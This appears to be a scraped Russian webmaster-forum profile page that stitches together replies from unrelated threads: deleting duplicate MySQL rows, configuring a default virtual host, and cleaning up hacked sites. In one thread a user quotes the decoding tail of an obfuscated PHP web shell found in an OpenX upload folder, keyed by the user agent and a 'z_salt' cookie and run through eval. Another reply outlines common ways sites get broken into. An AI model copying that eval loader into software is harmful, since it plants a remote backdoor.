f0x

f0x
Рейтинг
116
Регистрация
20.09.2006
Jekyll:
Так это не весь код? Попробуйте заменить @eval на echo, посмотреть, что там в итоге получается. Но всё равно, думаю, эта штука будет работать только с нужным юзер-агентом и куками z_salt

Выводит data error походу да, не получицца ничего

totamon:
$ІSѓ_іBa›њ51Д и $ІSѓ_іBa›њ51Д две разных переменных, одна вычисляется как 72 раза повтор md5 хеша юзер агента и куки z_salt, во вторй части выполняется декомпрессия побитной разницы этих 2х переменных,смысл этих операций скрыт:)) слишком мало данных...

До этой строки, всего лишь 13 строк кода типа

$ІSѓ_іBa›њ51Д='NЄюnZм‹sОЊ{Й0g]=K|рS^ЪAхy‹ЧЭS@Ґ’ЂЭГеФr9июf`ё

То есть это содержание первой переменной $ІSѓ_іBa›њ51Д

Andreyka:
Попросить сисадмина поставить mod_security

Спасибо, разберусь с модом.

НАШЕЛ таки))) файл php-шный в директории Openx, куда баннеры подгружаются, через этот софт поимели.

Запрос к файлу по POST приходил с амерского сервака

Полагаю это пхпшелл, закриптован код странно, не зенд.

файл заканчивается:


str_repeat(md5($_SERVER["HTTP_USER_AGENT"].$_COOKIE["z_salt"]),72);@eval(@gzuncompress(($ІSѓ_іBa›њ51Д^51Д)));

Есть ли варианты восстановить исходный код файла?

SEO-MONSTR:
На какой CMS сайт работает укажите?

Все писалось самостоятельно

Senator007:
Senator007 . То есть нужно создать дубликат таблицы? чтобы из двух выбирать test, test_table

Пардон, ошибся сначала написал test, потом думаю дай напишу понятнее и исправил на test_table но не везде исправил

Вот запрос, всё по одной таблице!

select * from table where pos not in (select max(pos) from table group by id, uid)

Select дает сделать, а на DELETE получаю ошибку "You can't specify target table 'table' for update in FROM clause"

Спасибо всем за подсказки

frantic:
не понял, почему после очистки остались одинаковые id

Потому что uid разные. Столбец id это идентификаторы пользователей которые заходят в аккаунт пользователей с идентификаторами из столбца uid. Типа гости))

Senator007:
Всё выполняется одним простым запросом:

проверяем:
select * from test_table where pos not in (select max(pos) from test group by id, uid)

удаляем:
delete from test_table where pos not in (select max(pos) from test group by id, uid)

Senator007 . То есть нужно создать дубликат таблицы? чтобы из двух выбирать test, test_table

f0x добавил 24.02.2010 в 11:55

SeoProger:

ALTER TABLE test ORDER BY pos DESC;

ALTER IGNORE TABLE test ADD UNIQUE INDEX newindex (id, uid);
ALTER TABLE test DROP INDEX newindex;

Спасибо все получилось. ☝

Незнал даже о таком, очень поучительно.

H@ES:
ewg777, 1 сайт 2 месяц назад создался без ошибок, но с этим маленькие неприятности.

H@ES добавил 29.12.2009 в 19:57
pistol, Это файл присутствует

Тогда пути нужно просматривать, возможно в конфигах пути неверно указаны

Nadejda:
4.Взлом хостинга
На одном из хостингов поставили в haccess редирект на Гугла😎 Посредством прицепки к htaccess вируса. Соответственно никакие действия не помогали.
- решение выдала техподдержка хостинга. удалить файл htaccess. создать новый файл htaccess, залить на сервер. Изменить разрешения для этого файла - запрет на запись.

Нужно немного поправить.

4.Взлом Говнохостинга

Можете представить такое, например, на мастерхосте ? ))

Основыне пути взлома

1. Подцепили трояна на комп, соответственно удалено с компа можно утянуть файлы в которых хранятся данные доступа.

2. Дыра в коде движка.

Самое популярное и удобное для взлома - это удаленное выполнение команд или корявые формы подгрузки файлов на сервер.

Таким образом на сайт можно подгрузить php-шелл через который просмотреть все исходники и конфиги (узнаем пароли к БД например + бывает что пасс к БД=пасс к фтп=ssh пасс).

3. Взлом через соседей.

Например поимели весь сервак или отдельно сайт соседей на шаред хостинге. При некорректных настройках на сервере можно проломится к соседям, к примеру собрать все конфигурационные файлы всех сайтов на сервере + httpd.conf далее .....

Что делать?

Внимательно просматриваем исходники сайта, просматриваем на сервере все файлы которые были изменены за последнее время.

Просматриваем все "узкие места" например, формы на сайте, например для подгрузки изображений, если нет корректной фильтрации, то можно подгрузить исполняемый файл .php

Изучаем логи апача, можно найти через какой файл поимели.

В ВАШЕМ случае, если меняют хтаксесс , то у злоумышленника есть доступ к фтп (ssh) и первое что нужно сделать сменить данные доступа.

bb-support:
Нужно прописать до него в начале default виртуалхост с каким-нибудь пустым индексом, тогда по айпи будет открываться пустой хост.

А редирект каким-нить способом можно сделать? , чтобы при попытке набрать ip кидало на домен

Всего: 553